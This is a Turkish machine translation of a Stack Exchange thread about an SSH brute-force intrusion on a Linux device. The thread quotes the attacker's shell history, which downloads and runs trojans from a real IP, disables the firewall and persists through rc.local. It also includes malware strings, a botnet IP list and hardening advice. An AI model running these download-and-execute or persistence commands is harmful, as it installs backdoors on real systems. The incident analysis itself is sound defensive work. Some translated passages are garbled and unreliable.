Az önce saldırıya uğradım mı?


492

Bir tüketici ürünü geliştiriyorum ve İnternet'e bağlı olması gerekiyordu, beklendiği gibi, doğru şekilde geliştirebilmem için İnternet'e bağlı.

Bir iki saatliğine gittim ve ofisime döndüğümde, terminalde yazılmış bazı garip komutlar gördüm.

Denilen Linux günlük dosyasına baktığımda auth.logaşağıdaki satırları görebiliyorum (birçoğu arasında):

Feb  1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162  user=root
Feb  1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb  1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]

IP adresinin Microsoft'a ait olduğu40.127.205.162 ortaya çıktı .

Ben uzaktayken kullanılan bir sürü komut:

  355  service iptables stop
  356  cd /tmp
  357  wget http://222.186.30.209:65534/yjz1
  358  chmod 0755 /tmp/yjz1
  359  nohup /tmp/yjz1 > /dev/null 2>&1 &
  360  chmod 777 yjz1
  361  ./yjz1
  362  chmod 0755 /tmp/yjz1
  363  nohup /tmp/yjz1 > /dev/null 2>&1 &
  364  chmod 0777 yjz1
  365  chmod u+x yjz1
  366  ./yjz1 &
  367  chmod u+x yjz1
  368  ./yjz1 &
  369  wget http://222.186.30.209:65534/yjz
  370  chmod 0755 /tmp/yjz
  371  nohup /tmp/yjz > /dev/null 2>&1 &
  372  chmod 777 yjz
  373  ./yjz
  374  chmod 0755 /tmp/yjz
  375  nohup /tmp/yjz > /dev/null 2>&1 &
  376  chmod u+x yjz
  377  ./yjz &
  378  chmod u+x yjz
  379  ./yjz &
  380  cd /tmp
  381  echo "cd  /tmp/">>/etc/rc.local
  382  service iptables stop
  383  cd /tmp
  384  wget http://222.186.30.209:65534/yjz1
  385  chmod 0755 /tmp/yjz1
  386  nohup /tmp/yjz1 > /dev/null 2>&1 &
  387  chmod 777 yjz1
  388  ./yjz1
  389  chmod 0755 /tmp/yjz1
  390  nohup /tmp/yjz1 > /dev/null 2>&1 &
  391  chmod u+x yjz1
  392  ./yjz1 &
  393  chmod 0777 yjz1
  394  ./yjz1 &
  395  echo "cd  /tmp/">>/etc/rc.local
  396  service iptables stop
  397  wget http://222.186.30.209:65534/yjz1
  398  chmod 0755 /root/yjz1
  399  nohup /root/yjz1 > /dev/null 2>&1 &
  400  chmod 777 yjz1
  401  ./yjz1
  402  chmod 0755 /root/yjz1
  403  nohup /root/yjz1 > /dev/null 2>&1 &
  404  chmod u+x yjz1
  405  ./yjz1 &
  406  chmod 0777 yjz1
  407  ./yjz1 &
  408  echo "cd  /root/">>/etc/rc.local
  409  cd /tmp
  410  service iptables stop
  411  wget http://222.186.30.209:65534/yjz1
  412  chmod 0755 /tmp/yjz1
  413  nohup /tmp/yjz1 > /dev/null 2>&1 &
  414  chmod 777 yjz1
  415  ./yjz1 &
  416  cd /etc
  417  echo "cd /root/">>/etc/rc.local
  418  echo "./yjz1&">>/etc/rc.local
  419  echo "./yjz1&">>/etc/rc.local
  420  echo "/etc/init.d/iptables stop">>/etc/rc.local
  421  cd /tmp
  422  service iptables stop
  423  wget http://222.186.30.209:65534/yjz1
  424  chmod 0755 /tmp/yjz1
  425  nohup /tmp/yjz1 > /dev/null 2>&1 &
  426  chmod 777 yjz1
  427  ./yjz1 &
  428  cd /etc
  429  echo "cd /root/">>/etc/rc.local
  430  echo "./yjz1&">>/etc/rc.local
  431  echo "./yjz1&">>/etc/rc.local
  432  echo "/etc/init.d/iptables stop">>/etc/rc.local
  433  cd /tmp
  434  service iptables stop
  435  wget http://222.186.30.209:65534/yjz1
  436  chmod 0755 /tmp/yjz1
  437  nohup /tmp/yjz1 > /dev/null 2>&1 &
  438  chmod 777 yjz1
  439  ./yjz1 &
  440  cd /etc
  441  echo "cd /root/">>/etc/rc.local
  442  echo "./yjz1&">>/etc/rc.local
  443  echo "./yjz1&">>/etc/rc.local
  444  echo "/etc/init.d/iptables stop">>/etc/rc.local
  445  service iptables stop
  446  wget http://222.186.30.209:65534/yjz1
  447  chmod 0755 /root/yjz1
  448  nohup /root/yjz1 > /dev/null 2>&1 &
  449  chmod 777 yjz1
  450  ./yjz1
  451  chmod 0755 /root/yjz1
  452  nohup /root/yjz1 > /dev/null 2>&1 &
  453  chmod 0777 yjz1
  454  chmod u+x yjz1
  455  ./yjz1 &
  456  chmod u+x yjz1
  457  ./yjz1 &

Ve dahası:

  481  service iptables stop
  482  wget http://222.186.30.209:65534/yjz1
  483  chmod 0755 /root/yjz1
  484  nohup /root/yjz1 > /dev/null 2>&1 &
  485  chmod 777 yjz1
  486  ./yjz1
  487  chmod 0755 /root/yjz1
  488  nohup /root/yjz1 > /dev/null 2>&1 &
  489  chmod 0777 yjz1
  490  chmod u+x yjz1
  491  ./yjz1 &
  492  chmod u+x yjz1
  493  ./yjz1 &
  494  cd /tmp
  495  service iptables stop
  496  wget http://175.102.133.55:2/yjz
  497  ./yd_cd/make
  498  service iptables stop
  499  service iptables stop
  500  wget http://222.186.30.209:65534/yjz1

Bundan tamamen haberi yoktu. Ürünümü doğru şekilde nasıl emniyet altına alabilirim?

Komple auth.logdosyayı göndermek istiyorum . Bunu nasıl yaparım?

Ayrıca, yjz1indirilen dosya bir Linux Trojan gibi görünüyor ve tüm bunlar http://anti-hacker-alliance.com/index.php?ip=40.127.205.162’ye göre bir tür hacker grubu tarafından yapıldığı görülüyor

Microsoft'u arayıp onlarla konuşmalı mıyım? Ne yapmalıyım?


40
Evet bu pek iyi görünmüyor. Herhangi bir şekilde Linux'ta uzman değilim, ancak bazı şeyler kesinlikle orada yürütülmeye çalıştı. Nasıl göründüğü gibi kök olarak giriş yapmayı denediğini ve başarısız olduğunu tam olarak bilmiyorum. Auth.log dosyasında başka kayıt var mı? Başka bir uzaktan yönetim aracı var mı? Bir SSH girişimi gibi görünse de, Mac’in VNC sunucusunu etkin bir şekilde kullanarak saldırıya uğradığını gördüm. İndirdiği IP'ler Çin'de bir yerde barındırılıyor gibi görünüyor.
Jonno

68
Zorla zorla girdin. Bu yüzden, bir şifreniz olsa bile, internette bir ssh sunucusu bırakılmıyor. Anahtar tabanlı kimlik doğrulamasının eksik olduğu bir şey bugünlerde yeterince güvenli değil.
Journeyman Geek

80
Security.stackexchange.com'a sahibiz . Ama önce ilk şey: Tehdit edilen ev sahibi artık güvenilmez. Ağdan çıkarın. Mümkünse bir yedekleme yapın, böylece ne yapıldığını ve nasıl yapıldığını araştırabilirsiniz. Sonra işletim sistemini temiz bir kaynaktan yeniden yükleyin. Verileri yedeklerden geri yükleyin. Sistemi güvende tutun, böylece tekrar virüs bulaşmaz. Nasıl girdiklerini bulmak şiddetle tavsiye edilir. (Bu nedenle virüslü sistemin bir kopyasını alma önerisi).
Hennes

84
FYI: 40.127.205.162, GeoIP'e göre bir Microsoft Azure IP adresidir. Sonuç olarak, saldırı için Microsoft’u suçlayamazsınız - bu birileri spam için EC2 kullandığı için Amazon’u suçlamaya eşdeğerdir. Microsoft'un gerçekten yapabildiği tek şey saldırganları Azure'dan kovmak, ancak kısa sürede farklı bir bulut platformuna geri dönecekler.
nneonneo

41
Aslında, eğer bu sizin terminalinize yazılmışsa, bilgisayar korsanı muhtemelen bir sonraki odaya oturuyordur.
isanae

Yanıtlar:


487

EDIT 2 :

Bu yazının bu kadar dikkat çekmesinin iyi bir nedeni var: Bilgisayarınıza izinsiz giriş yapan kişinin tüm canlı oturumunu kaydetmeyi başardınız. Bu, eylemlerinin sonuçlarının keşfi ile uğraştığımız ve onları telafi etmeye çalıştığımız günlük deneyimlerimizden çok farklı. Burada onu işte görüyoruz, arka kapıyı kurma konusunda bazı problemleri olduğunu görüyoruz, adımlarını izliyorum, ateşli bir şekilde çalışıyoruz (belki de yukarıda belirtildiği gibi masanızda oturuyordu, belki de ve bence daha muhtemeldi çünkü) kötü amaçlı yazılımını sistemde çalıştıramaz, aşağıda okuyabilir) ve tamamen bağımsız denetim araçlarını kullanmaya çalışın. Güvenlik araştırmacılarının bal tuzaklarıyla günlük olarak gördükleri şey budur . Benim için bu çok nadir bir şans ve biraz eğlencenin kaynağı.


Kesinlikle saldırıya uğradın. Bunun için kanıt yok değil pasajında gelen auth.logbu kısa zaman dilimi (iki saniye) üzerinde meydana gelen başarısız bir oturum açma girişimini bildiriyor nedeniyle, görüntülenen dosyaya. İkinci çizginin Failed password, üçüncü pre-authkesimin bağlantının kesildiğini bildirdiğini belirtirsiniz : adam denenmiş ve başarısız olmuş.

Kanıt, bunun yerine iki dosyanın içeriğinden http://222.186.30.209:65534/yjzve http://222.186.30.209:65534/yjz1saldırganın sisteminize indirdiğinden gelir.

Site şu anda yaptığım indirmeleri için herkese açık. Önce fileonlara koştum , ki gösterdi ki:

$ file y*
yjz:      ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
yjz1:     ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

Sonra onları sahip olduğum 64-bit Debian VM'ye getirdim; stringsKomut aracılığıyla içeriklerinin incelenmesi, çok şüpheli olduğunu ortaya çıkardı (çok iyi bilinen çeşitli saldırılara, yerine kullanılacak komutlara, yeni bir hizmet oluşturmak için açıkça kullanılan bir komut dosyasına, vb.).

Daha sonra her iki dosyanın MD5 karmasını oluşturdum ve kötü amaçlı yazılımın bilinen ajanları olup olmadıklarını görmek için Cymru'nun karma veritabanına besledim . Olmasa yjzda, yjz1olduğu gibi ve Cymru% 58 anti-virüs yazılımı ile tespit edilme olasılığını rapor eder. Ayrıca, bu dosyanın en son üç gün önce görüldüğünü, dolayısıyla oldukça yeni olduğunu belirtti.

Koşu clamscan (parçası clamavEdindiğim iki dosyalar üzerinde paketin):

$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND

bu yüzden artık standart Linux yazılımının onu tanımlayabildiğinden eminiz.

Ne yapmalısın?

Oldukça yeni olsa da, her ikisi de çok yeni değildir, örneğin Ocak XorDdos hakkındaki bu makaleye bakınız . Bu yüzden çoğu ücretsiz paket onu kaldırabilmelidir. : Sen denemelisiniz clamav, rkhunter, chkrootkit. Etrafta Googledim ve onu tespit edebildiklerini iddia ettiklerini gördüm. Selefi çalışmalarını kontrol etmek için bunları kullanın, ancak bu üç programı çalıştırdıktan sonra gitmeye hazır olmalısınız.

Daha büyük soruya gelince what should you do to prevent future infections, Journeyman'in cevabı iyi bir ilk adımdır. Sadece devam eden bir mücadele olduğunu, hepimizin (ben de dahil!) Bilmeden çok kaybedebileceğini unutmayın.

EDIT :

Viktor Toth'un (dolaylı) komut isteminde birkaç yorum eklemek istiyorum. Davetsiz misafirin bazı zorluklarla karşılaştığı kesin olarak doğrudur: iki farklı bilgisayar korsanlığı aracı indirir, izinlerini birkaç kez değiştirir, birkaç kez yeniden başlatır ve güvenlik duvarını devre dışı bırakmak için birçok kez çalışır. Neler olduğunu tahmin etmek kolaydır: bilgisayar korsanlık araçlarından virüslü hastalarından birine doğru bir iletişim kanalı açmalarını bekler (sonraya bakınız) ve bu yeni kanalı kontrol GUI'sinde ortaya çıkmadığında korsanlıktan korkuyor aracı güvenlik duvarı tarafından engellendiğinden kurulum prosedürünü tekrarlıyor. Viktor Toth'a operasyonunun bu özel aşamasının beklenen meyveleri getirmediği konusunda katılıyorum, ancak sizi çok güçlü bir şekilde teşvik etmek istiyorum PC'nize verilen zararın kapsamını hafife almamak.

Burada kısmi bir çıktı verdim strings yjz1:

etc/init.d/%s
/etc/rc%d.d/S90%s
--del
chkconfig
remove
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
--add
defaults
/proc/%d/exe
/proc/self/exe
HOME=/
MYSQL_HISTFILE=/dev/null
#!/bin/sh
# chkconfig: 12345 90 90
# description: %s
### BEGIN INIT INFO
# Provides:             %s
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    %s
### END INIT INFO
case $1 in
start)
stop)
esac
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;      TencentTraveler ; .NET CLR 1.1.4322)
Connection: Keep-Alive

Bu (hizmet tahrif kanıtı temin /etc/init.dve içinde /etc/rc.dolan,) crontaböyküsü dosyası ile, mysqlve dosyaların bir çift içinde prochangi bağlantılarıdır bash(dikildi kabuğundan ısmarlama hileli versiyonunu göstermektedir). Ardından, program bir HTTP isteği oluşturur (Çince konuşan bir siteye,

 Accept-Language: zh-cn

Bu, David Schwartz'ın yukarıdaki yorumuna dikkat çeker). İstekte, ikili dosyalar ( Content-Type: application/x-www-form-urlencoded) saldırıya uğrayan bilgisayara (GET) indirilecek ve kontrol makinesine (POST) yüklenecektir. Saldırıya uğrayan bilgisayara ne indirileceğini bulamadım, ancak her ikisinin yjzve yjz1(1.1 MB ve 600kB boyutlarındaki küçük boyutu göz önüne alındığında ), rootkit'i gizlemek için gereken dosyaların çoğunu, yani değiştirilenleri tahmin etmek için girişimde bulunabilirim. sürümleri ls, netstat, ps, ifconfig, ..., bu şekilde indirilebilir olacaktır. Bu da saldırganın ateşli girişimlerinin bu indirmeyi gerçekleştirme girişimlerini açıklar.

Yukarıdakilerin tüm olasılıkları tükettiği kesin değildir: transkriptin bir kısmından kesinlikle yoksun (satır 457 ve 481 arasında) ve bir çıkış görmüyoruz; ayrıca, özellikle endişe verici çizgiler 495-497,

cd /tmp;  ./yd_cd/make

indirilen görmediğimiz bir dosyaya bakın ve hangisi bir derleme olabilir : öyleyse, saldırganın (nihayet?) çalıştırılabilirleriyle ilgili sorunun ne olduğunu anladığı ve onu düzeltmeye çalıştığı anlamına gelir. saldırıya uğrayan bilgisayar iyiye gitti. [Aslında, saldırganın saldırıya uğrayan makineye indirdiği kötü amaçlı yazılımın iki sürümü (ve ben 64bit Debian VM'ime), uygun olmayan bir mimari için, x86, hack'lenen PC'nin tek başına adı, bir kol mimarisiyle uğraşıyordu].

Bu düzenlemeyi yazmamın nedeni, sisteminizi profesyonel bir araçla bir araya getirmeniz ya da sıfırdan yeniden yüklemeniz için sizi mümkün olduğunca güçlü bir şekilde teşvik etmek.

Ve bu arada, bu herkes için faydalı olsa da, bağlanmaya çalışan 331 IP adresinin listesi yjz. Bu liste o kadar büyük ki (ve muhtemelen daha da büyüyecek), kurcalamanın sebebinin bu olduğuna inanıyorum mysql. Diğer arka kapı tarafından sağlanan liste aynıdır, sanırım bu kadar önemli bir bilgiyi açıkta bırakmanın nedenidir ( saldırganın onları çekirdek biçiminde saklamak için çaba göstermek istemediğini düşünüyorum . listenin tamamını, hangi işletim sistemi için olursa olsun, arka kapağının tümü tarafından okunan açık bir metin dosyasına koymuştur:)

61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
119.6.6.6
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.1.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98

Aşağıdaki kod

 #!/bin/bash
 echo 0 > out
 while read i; do
       whois $i | grep -m 1 -i country >> out
 done < filename
 cat out | grep -i cn | wc -l

Yukarıdaki liste gösteriyor üzerinde 302 toplam üzerinden 331 adreslerde anakara Çin'de, geri kalanlar Hong Kong, Moğolistan, Tayvan bulunmaktadır. Bu, David Schwartz'ın bunun çoğunlukla bir Çin bot halkası olduğu iddiasına daha fazla destek veriyor.

EDIT 3

@ Vaid'in isteği üzerine (OP'nin yazarı, aşağıdaki yorumu okuyunuz), temel bir Linux sisteminin güvenliğini nasıl güçlendireceğimiz hakkında bir yorum ekleyeceğim (birçok hizmet sunan bir sistem için bu çok daha karmaşık bir konudur). vaidaşağıdakileri yaptığını belirtir:

  1. Sistemi yeniden yükleyin

  2. root şifresini karışık, küçük ve büyük harf, karakter ve rakamlardan oluşan 16 karakter uzunluğunda bir parola olarak değiştirdi.

  3. Kullanıcı adını 6 karakter uzunluğunda bir kullanıcı adıyla değiştirdi ve root için kullanılan parolayı uygulayın.

  4. SSH portunu 5000'in üzerindeki bir değere değiştirdi

  5. SSH kök girişini kapattı.

Bu iyi (çoğu yararlı program 10.000'in altındaki bağlantı noktalarını kullandığından, 10.000'in üstündeki bir bağlantı noktasını kullanmam dışında). Ancak , ssh girişi için şifreler yerine kriptografik anahtarlar kullanma gereğini yeterince vurgulayamıyorum . Sana kişisel bir örnek vereceğim. VPS'lerimden birinde ssh portunu değiştirip değiştirmeyeceğime emin değildim; 22'de bıraktım ama kimlik doğrulama için şifreli anahtarlar kullandım. Günde yüzlerce zorla girme denemesi yaptım , hiçbiri başarılı olmadı . Kimsenin başarılı olmadığını her gün kontrol etmek için yorulduğumda, sonunda limanı 10.000’in üzerinde bir şeye geçirdim, zorla girme girişimleri sıfıra gitti. Unutma, hackerların aptal olmaları değil (onlar değil!), Sadece daha kolay avlarlar.

RSA ile bir kripto anahtarını imza algoritması olarak etkinleştirmek kolaydır, aşağıdaki yorumlara bakınız: Jan Hudec (teşekkürler!):

 cd; mkdir .ssh; chmod 700 .ssh; cd .ssh; ssh-keygen -t rsa (then hit <kbd>ENTER>/kbd> three times); cat id_rsa.pub >> authorized_keys; chmod 600 *

Şimdi tek yapmanız gereken dosyayı id_rsabağlamak istediğiniz makineye kopyalamak ( .sshayrıca bir dizinde ( chmod700'e yazılmış), sonra da komutu verin.

ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine

Bunun çalıştığından emin olduğunuzda, dosyayı sunucuda düzenleyin (= bağlanmak istediğiniz makine) /etc/ssh/sshd_configve satırı değiştirin

#PasswordAuthentication yes

için

PasswordAuthentication no

ve sshhizmeti yeniden başlatın ( service ssh restartveya systemctl restart ssh, dağıtıma bağlı olarak veya bunun gibi bir şey).

Bu çok dayanacak. Aslında şu anda openssh v2ve RSA'nın şu andaki sürümlerine karşı bilinen hiçbir istismar mevcut değildir openssh v2.

Son olarak, makinenizi gerçekten cıvatalamak için güvenlik duvarını (netfilter / iptables) aşağıdaki gibi yapılandırmanız gerekir:

 iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
 iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
 iptables -P INPUT DROP
 iptables -P OUTPUT ACCEPT
 iptables -A INPUT -i lo -j ACCEPT
 iptables -A OUTPUT -o lo -j ACCEPT

Bu, 1) hem LAN hem de WAN'dan ssh bağlantılarına izin verir, 2) istekleriniz tarafından oluşturulan tüm girişlere izin verir (örneğin, bir Web sayfasını yüklediğinizde), 3) girişte kalan her şeyi bırakır, 4) girilen her şeyi sağlar çıkış ve 5-6) geridöngü arayüzü üzerindeki her şeye izin verir.

İhtiyaçlarınız arttıkça ve daha fazla bağlantı noktasının açılması gerektiğine göre, listenin başına, aşağıdaki gibi kuralları ekleyerek yapabilirsiniz:

 iptables -A INPUT -p tcp --dport 80 -j ACCEPT

Örneğin kişilerin Web tarayıcınıza erişmesine izin vermek için.


11
Bu okumak harikaydı. Ben de dosyayı olumlu çalışan yjz1Googles VirusTotal.com aracılığıyla denedim . Bunun yjzindirildiğini bile görmedim . Teşekkürler.
saat

34
stringsGüvenilmeyen veriler üzerinde çalışırken dikkatli olun . lcamtuf.blogspot.com/2014/10/…
Matt Nordhoff

5
@MattNordhoff Buna dikkat çektiğiniz için teşekkürler, mutluluktan haberi yoktu. Ancak, Debian'ımda 'strings' komutu, uçan renklerle ilişkilendirdiğiniz testi geçiyor. Bunun manuel olarak belirtilmiş olmasından kaynaklandığını tahmin ediyorum: -a ... Normalde varsayılan davranış budur . Şerefe.
MariusMatutiae

32
Bu cevap bir paradigma olması gereken bir yaklaşımı göstermektedir: 1. Dikkatinizi başarısız girişimlerden saptırmayın, uyarın. 2. Saldırganın başarılı eylemlerini bireyselleştirin. 3. Saldırganın ne ve nasıl yaptığını inceleyin. 4. Tüm sıfırdan veya bozulmamış (saldırıya uğramış) yedeklemeden hepsini yükleyin, bulduğunuz gerekli ek korumaları ekleyin (3. nokta). 5. Başkalarının kendilerini korumalarına yardımcı olun (tehlike altındaki / şüpheli IP listesi).
Hastur

11
[@MariusMatutiae tarafından yorumun sonra Kaldırıldı] - Yine de, OP, bir tehlikeye sistemde farkına varmalıdır her yürütülebilir kötü niyetli olarak kabul edilmelidir bile kabuk, ls, whobaşka ya da bir şey. Risk altındaki sistemdeki herhangi bir çalıştırılabilir dosyayı kullanarak "veri kurtarma" (örneğin scpveya rsync) daha fazla makineyi tehlikeye atabilir.
Dubu

142

Açık olan herhangi bir SSH sunucusunun sondalanabileceği, kaba bir şekilde zorlanacağı ve üzerinde çeşitli çetelere neden olduğu Internet'e hoş geldiniz.

Başlamak için, üründeki depolamayı tamamen silmeniz gerekir. Adli tıpa geçmek istiyorsanız, onu hayal edin, ancak Linux'un yüklendiği şüpheli.

Biraz tahminde bulunmak

  1. Zorla zorlandın veya ortak bir şifre kullandın. Gizliliğin olmadığı bir güvenlik ancak bir sözlük şifresi istemiyor veya SSH'ye açık bir kök hesap kullanmak istemiyorsunuz . Bir seçenekse kök SSH erişimini devre dışı bırakın veya en azından adını değiştirerek her ikisini de tahmin etmeleri gerekir. Kök olarak SSHing, zaten korkunç bir güvenlik uygulamasıdır. Kök kullanmanız gerekiyorsa, başka bir kullanıcı olarak oturum açın ve geçiş yapmak için su veya sudo kullanın.

  2. Ürüne bağlı olarak, SSH erişimini bir şekilde kilitlemek isteyebilirsiniz. Toplam kilit aşağı iyi bir fikir gibi geliyor ve kullanıcılar bunu açmaya imkan tanır gerektiği gibi . Hangi kaynakları ayırabileceğinize bağlı olarak, yalnızca kendi alt ağınızda IP adreslerine veya bir tür oturum açma azaltma sistemine izin vermeyi düşünün. Nihai üründe ihtiyacınız yoksa kapalı olduğundan emin olun.

  3. Standart olmayan bir port kullanın. Yine belirsiz güvenlik, ancak bir saldırganın limanınızı hedeflemesi gerektiği anlamına gelir.

  4. Asla varsayılan bir şifre kullanmayın. Gördüğüm en iyi yaklaşım, belirli bir cihaz için rastgele bir şifre oluşturmak ve bunu ürününüzle birlikte göndermektir. En iyi uygulama anahtar temelli kimlik doğrulamadır, ancak toplu pazar ürününde buna nasıl yaklaşacağınız hakkında hiçbir fikrim yok.


76
5. Mümkünse, ortak anahtar auth kullanın. Parola kimlik doğrulama çok uzak, çok az güvenli.
Bob,

4
Evet, ancak tüketici cihazı ise, seçenek olmayabilir. Dev bir kutuda, parlak bir fikir gibi geliyor. Bir sunucuda daha önce saldırıya
uğradım

2
Tüketici cihazı ise, hepsinde aynı rasgele şifre veya anahtar aynı zamanda kötü bir fikirdir. Seri numarası, MAC veya başka türlü tanımlanabilir bilgilere dayanan herhangi bir şey olduğu gibi. (Pek çok SoHO modem / yönlendirici / WAP'ın kaçırdığı bir şey).
Hennes

2
Bu bir tüketici cihazıdır. Ancak, hedeflenen tüketicinin büyük çoğunluğu SSH'nin ne olduğunu bilecek kadar eğitilmeyecektir. Böylece SSH kapatılabilir ve büyük olasılıkla kapatılır.
saat

2
Ayrıca fail2ban kullanın .
Shadur

34

Oh, kesinlikle saldırıya uğradın. Birisi kök kimlik bilgilerini kazanmış ve sisteminize bir Truva atı indirmeye çalışmış görünüyor. MariusMatutiae yükün bir analizini sağladı.

İki soru ortaya çıkıyor: a) Saldırgan başarılı oldu mu? B) bu konuda ne yapabilirsiniz?

İlk sorunun cevabı hayır olabilir . Saldırganın arka arkaya başarılı şekilde yükü nasıl indirmeye ve çalıştırmaya çalıştığına dikkat edin. Bir şeyin (SELinux, perchance?) Yolunda durduğundan şüpheleniyorum.

NASIL HİÇ: Saldırgan da /etc/rc.d/rc.localsisteminizi yeniden başlattığınızda yükün etkinleştirileceğini umarak dosyanızı değiştirdi . Sistemi henüz yeniden başlatmadıysanız, bu değişiklikleri kaldırana kadar yeniden başlatmayın /etc/rc.d/rc.local. Zaten yeniden başlattıysanız ... iyi şanslar.

